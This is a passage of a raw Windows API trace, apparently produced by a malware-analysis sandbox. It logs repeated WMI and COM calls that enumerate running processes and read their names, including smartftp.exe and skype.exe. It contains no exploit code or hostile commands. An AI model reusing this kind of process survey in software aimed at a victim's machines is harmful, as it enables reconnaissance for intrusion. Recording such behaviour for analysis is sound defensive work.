wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.623] IWbemClassObject:Get (in: This=0x562f520, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2076\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.623] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2076\"") returned 0x66 [0214.623] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2076\"") returned 0x66 [0214.623] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.623] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.623] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.623] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.624] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5632028) returned 0x0 [0214.624] WbemDefPath:IUnknown:QueryInterface (in: This=0x5632028, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.624] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5632028, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x56312d8) returned 0x0 [0214.624] WbemDefPath:IUnknown:Release (This=0x5632028) returned 0x0 [0214.624] WbemDefPath:IUnknown:QueryInterface (in: This=0x56312d8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x56312d8) returned 0x0 [0214.624] WbemDefPath:IUnknown:QueryInterface (in: This=0x56312d8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.625] WbemDefPath:IUnknown:AddRef (This=0x56312d8) returned 0x3 [0214.625] WbemDefPath:IUnknown:QueryInterface (in: This=0x56312d8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.625] WbemDefPath:IUnknown:QueryInterface (in: This=0x56312d8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.625] WbemDefPath:IUnknown:QueryInterface (in: This=0x56312d8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5632038) returned 0x0 [0214.625] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5632038, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.625] WbemDefPath:IUnknown:Release (This=0x5632038) returned 0x3 [0214.625] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.625] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.625] WbemDefPath:IUnknown:QueryInterface (in: This=0x56312d8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.625] WbemDefPath:IUnknown:Release (This=0x56312d8) returned 0x2 [0214.625] WbemDefPath:IUnknown:Release (This=0x56312d8) returned 0x1 [0214.625] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.625] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.625] WbemDefPath:IUnknown:QueryInterface (in: This=0x56312d8, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x56312d8) returned 0x0 [0214.625] WbemDefPath:IUnknown:AddRef (This=0x56312d8) returned 0x3 [0214.625] WbemDefPath:IUnknown:Release (This=0x56312d8) returned 0x2 [0214.625] WbemDefPath:IWbemPath:SetText (This=0x56312d8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2076\"") returned 0x0 [0214.625] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.625] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.625] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.626] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.626] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.626] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.626] IWbemClassObject:Get (in: This=0x562f520, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2695490*=0, plFlavor=0x2695494*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="smartftp.exe", varVal2=0x0), pType=0x2695490*=8, plFlavor=0x2695494*=0) returned 0x0 [0214.626] SysStringByteLen (bstr="smartftp.exe") returned 0x18 [0214.626] SysStringByteLen (bstr="smartftp.exe") returned 0x18 [0214.626] IWbemClassObject:Get (in: This=0x562f520, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2695490*=8, plFlavor=0x2695494*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="smartftp.exe", varVal2=0x0), pType=0x2695490*=8, plFlavor=0x2695494*=0) returned 0x0 [0214.626] SysStringByteLen (bstr="smartftp.exe") returned 0x18 [0214.626] SysStringByteLen (bstr="smartftp.exe") returned 0x18 [0214.626] CoTaskMemAlloc (cb=0x4) returned 0x5632068 [0214.626] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5632068, puReturned=0x267acc0 | out: apObjects=0x5632068*=0x562f6b8, puReturned=0x267acc0*=0x1) returned 0x0 [0214.627] IUnknown:QueryInterface (in: This=0x562f6b8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x562f6b8) returned 0x0 [0214.627] IUnknown:QueryInterface (in: This=0x562f6b8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.627] IUnknown:QueryInterface (in: This=0x562f6b8, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.627] IUnknown:AddRef (This=0x562f6b8) returned 0x3 [0214.627] IUnknown:QueryInterface (in: This=0x562f6b8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.627] IUnknown:QueryInterface (in: This=0x562f6b8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.627] IUnknown:QueryInterface (in: This=0x562f6b8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x562f6bc) returned 0x0 [0214.627] IMarshal:GetUnmarshalClass (in: This=0x562f6bc, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.628] IUnknown:Release (This=0x562f6bc) returned 0x3 [0214.628] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.628] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.628] IUnknown:QueryInterface (in: This=0x562f6b8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.628] IUnknown:Release (This=0x562f6b8) returned 0x2 [0214.628] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.628] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.628] IUnknown:QueryInterface (in: This=0x562f6b8, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x562f6b8) returned 0x0 [0214.628] IUnknown:AddRef (This=0x562f6b8) returned 0x4 [0214.628] IUnknown:Release (This=0x562f6b8) returned 0x3 [0214.628] IUnknown:Release (This=0x562f6b8) returned 0x2 [0214.628] CoTaskMemFree (pv=0x5632068) [0214.628] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.628] IUnknown:AddRef (This=0x562f6b8) returned 0x3 [0214.628] IWbemClassObject:Get (in: This=0x562f6b8, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.629] IWbemClassObject:Get (in: This=0x562f6b8, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2296\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.629] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2296\"") returned 0x66 [0214.629] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2296\"") returned 0x66 [0214.629] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.629] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.629] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.629] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.630] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5632068) returned 0x0 [0214.630] WbemDefPath:IUnknown:QueryInterface (in: This=0x5632068, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.630] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5632068, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x56313b8) returned 0x0 [0214.630] WbemDefPath:IUnknown:Release (This=0x5632068) returned 0x0 [0214.630] WbemDefPath:IUnknown:QueryInterface (in: This=0x56313b8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x56313b8) returned 0x0 [0214.630] WbemDefPath:IUnknown:QueryInterface (in: This=0x56313b8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.630] WbemDefPath:IUnknown:AddRef (This=0x56313b8) returned 0x3 [0214.630] WbemDefPath:IUnknown:QueryInterface (in: This=0x56313b8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.630] WbemDefPath:IUnknown:QueryInterface (in: This=0x56313b8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.631] WbemDefPath:IUnknown:QueryInterface (in: This=0x56313b8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5632078) returned 0x0 [0214.631] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5632078, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.631] WbemDefPath:IUnknown:Release (This=0x5632078) returned 0x3 [0214.631] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.631] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.631] WbemDefPath:IUnknown:QueryInterface (in: This=0x56313b8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.631] WbemDefPath:IUnknown:Release (This=0x56313b8) returned 0x2 [0214.631] WbemDefPath:IUnknown:Release (This=0x56313b8) returned 0x1 [0214.631] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.631] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.631] WbemDefPath:IUnknown:QueryInterface (in: This=0x56313b8, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x56313b8) returned 0x0 [0214.631] WbemDefPath:IUnknown:AddRef (This=0x56313b8) returned 0x3 [0214.631] WbemDefPath:IUnknown:Release (This=0x56313b8) returned 0x2 [0214.631] WbemDefPath:IWbemPath:SetText (This=0x56313b8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2296\"") returned 0x0 [0214.631] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.631] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.631] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.631] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.631] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.631] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.631] IWbemClassObject:Get (in: This=0x562f6b8, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2695d04*=0, plFlavor=0x2695d08*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="skype.exe", varVal2=0x0), pType=0x2695d04*=8, plFlavor=0x2695d08*=0) returned 0x0 [0214.631] SysStringByteLen (bstr="skype.exe") returned 0x12 [0214.632] SysStringByteLen (bstr="skype.exe") returned 0x12 [0214.632] IWbemClassObject:Get (in: This=0x562f6b8, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2695d04*=8, plFlavor=0x2695d08*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="skype.exe", varVal2=0x0), pType=0x2695d04*=8, plFlavor=0x2695d08*=0) returned 0x0 [0214.632] SysStringByteLen (bstr="skype.exe") returned 0x12 [0214.632] SysStringByteLen (bstr="skype.exe") returned 0x12 [0214.632] CoTaskMemAlloc (cb=0x4) returned 0x56320a8 [0214.632] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56320a8, puReturned=0x267acc0 | out: apObjects=0x56320a8*=0x562f850, puReturned=0x267acc0*=0x1) returned 0x0 [0214.633] IUnknown:QueryInterface (in: This=0x562f850, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x562f850) returned 0x0 [0214.633] IUnknown:QueryInterface (in: This=0x562f850, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.633] IUnknown:QueryInterface (in: This=0x562f850, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.633] IUnknown:AddRef (This=0x562f850) returned 0x3 [0214.633] IUnknown:QueryInterface (in: This=0x562f850, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.633] IUnknown:QueryInterface (in: This=0x562f850, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.633] IUnknown:QueryInterface (in: This=0x562f850, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x562f854) returned 0x0 [0214.633] IMarshal:GetUnmarshalClass (in: This=0x562f854, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.633] IUnknown:Release (This=0x562f854) returned 0x3 [0214.633] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.633] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.633] IUnknown:QueryInterface (in: This=0x562f850, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.633] IUnknown:Release (This=0x562f850) returned 0x2 [0214.633] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.633] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.634] IUnknown:QueryInterface (in: This=0x562f850, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, 